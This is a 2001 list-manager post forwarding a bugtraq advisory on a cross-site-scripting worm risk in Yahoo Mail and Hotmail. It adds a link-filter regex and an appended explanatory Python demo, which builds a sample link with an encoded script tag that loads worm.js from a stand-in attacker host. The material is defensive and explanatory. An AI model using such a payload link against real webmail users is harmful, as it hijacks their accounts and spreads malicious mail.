Great Circle Associates List-Managers
(May 2001)

Subject: [mparcens @ hushmail . com: Yahoo/Hotmail scripting vulnerability, worm propagation]
From: Norbert Bollow <nb @ thinkcoach . com>
Date: Fri, 1 Jun 2001 01:00:40 +0200
To: list-managers @ greatcircle . com
Prefer-language: de, en, fr

Here is a new type of possible malware that is not stopped by
standard demime/attachment stripping.

I have just added a check for the regular expression

/https?:\S*(%3a|\:)(%2f|\/)(%2f|\/)/i

and messages which match this regexp will be bounced to the
moderators as containing a "Potentially malicious link".

You may want to consider doing the same.

Greetings, Norbert.


------- Start of forwarded message -------
X-From_: bugtraq-return-229-nb=thinkcoach . com @ securityfocus . com  Thu May 31 18:38:05 2001
X-Envelope-To: <bollow @ cyberlink . ch>
X-Real-To: <bollow @ cyberlink . ch>
Mailing-List: contact bugtraq-help @ securityfocus . com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq @ securityfocus . com>
List-Help: <mailto:bugtraq-help @ securityfocus . com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe @ securityfocus . com>
List-Subscribe: <mailto:bugtraq-subscribe @ securityfocus . com>
From: mparcens @ hushmail . com
Date: Wed, 30 May 2001 19:18:08 -0500 (EDT)
To: bugtraq @ securityfocus . com
Content-type: multipart/mixed; boundary="Hushpart_boundary_dAfMJfpqUApfpvnobyxrXSpSoIJaULVu"
Subject: Yahoo/Hotmail scripting vulnerability, worm propagation


Title: Yahoo/Hotmail scripting vulnerability, worm propagation


Synopsis

Cross-site-scripting holes in Yahoo and Hotmail make it possible to replicate 
a Melissa-type worm through those webmail services.


Description

An email is sent to the victim, who uses Yahoo Mail or Hotmail. Inside the 
email is a link to yahoo or hotmail's own server. The link contains escaped 
javascript that is executed when the page is loaded. That javascript then 
opens a window that could navigate through the victim's inbox, sending messages 
with the malicious link to every email address it finds in the inbox. Because 
the malicious javascript executes inside a page from the mail service's 
own server, there is no domain-bounding error when the javascript is controlling 
the window with the victim's inbox.


Who is vulnerable

Users of the Yahoo Mail and Hotmail service. Although the exploit requires 
a user to click on a link, two things work for this exploit. (1) The email 
comes from a familiar user (sent by the worm), and (2) The link is to a 
familiar, trusted server. Theoretically, more services are vulnerable, due 
to the proliferation of these holes, but the worm is limited to web mail 
services.


Proof-of-Concept

Sample links and the worm code can be found at: http://www.sidesport.com/webworm/


Solution

Escaping all query data that is echoed to the screen eliminates this problem. 
This must be done on every page on a server that can send or read mail for 
the service.


Vendor Status

Both Yahoo and Hotmail were notified on May 23 2001.


-mparcens
mparcens @ hushmail . com

Free, encrypted, secure Web-based email at www.hushmail.com


IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
------- End of forwarded message -------
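As an added illustration (it is not part of Norbert's message or of the bugtraq advisory), the following Python models both halves of what is described above: the server-side echo of query data that the advisory says must be escaped on every mail page, and the list-manager regex check from the top of the message, run over constructed sample links. The host names, the `q` parameter and the page template are assumptions made for the example; the regex is Norbert's, carried over unchanged.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample link (hosts are assumptions): it points at the webmail
# host itself, and the query carries a percent-encoded <script> tag whose
# src pulls the worm from an attacker-controlled host.
WORM_LINK = (
    "http://mail.webmail.example/search?q="
    "%3Cscript%20src%3D%22http%3A%2F%2Fattacker.example%2Fworm.js%22"
    "%3E%3C%2Fscript%3E"
)


def render_search_page(url, escape_output):
    """Model the 'echo the query back to the user' pattern from the advisory.

    Returns the HTML the mail server would send for the given request URL.
    With escape_output=False the decoded parameter is inserted verbatim,
    which is the hole the advisory describes; with escape_output=True it is
    HTML-escaped first, which is the advisory's proposed fix.
    """
    query = parse_qs(urlsplit(url).query)
    term = query.get("q", [""])[0]  # parse_qs already percent-decodes
    if escape_output:
        term = html.escape(term, quote=True)
    return f"<html><body>Results for: {term}</body></html>"


def script_is_live(page_html):
    """True if the rendered page still contains a raw <script> tag."""
    return "<script" in page_html.lower()


# Norbert's check: an http(s) link that contains a second "://" (literal or
# percent-encoded, any case) somewhere after its start.
SUSPICIOUS_LINK = re.compile(r"https?:\S*(%3a|:)(%2f|/)(%2f|/)", re.IGNORECASE)


def is_suspicious_link(text):
    """True if the message text matches the list-manager regex."""
    return SUSPICIOUS_LINK.search(text) is not None


if __name__ == "__main__":
    for escape in (False, True):
        page = render_search_page(WORM_LINK, escape_output=escape)
        print(f"escape_output={escape}: script live = {script_is_live(page)}")
        print("   ", page)

    # Constructed message bodies (hosts are assumptions).
    samples = [
        "See http://www.greatcircle.com/lists/ for the archive",
        "Two links: http://a.example/x and http://b.example/y",
        "Check this out: " + WORM_LINK,
        "http://a.example/redir?to=http://b.example/",
    ]
    for body in samples:
        verdict = "BOUNCE to moderators" if is_suspicious_link(body) else "pass"
        print(f"{verdict:20s} {body}")
```

Two points follow from running it. First, `parse_qs` has already percent-decoded the parameter by the time it reaches the template, so the encoding in the link buys the attacker nothing against the browser but defeats a casual read of the URL; only escaping at output time (`html.escape`) neutralises the tag. Second, the regex flags any link that carries a second `://` in literal or `%3a%2f%2f` form, so a benign redirect link with an embedded URL is bounced as well, which is why matches go to the moderators rather than being dropped. A link written in an HTML-formatted message with the colon as a character entity (for example `&#58;`) contains neither `:` nor `%3a` and would not match this pattern.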

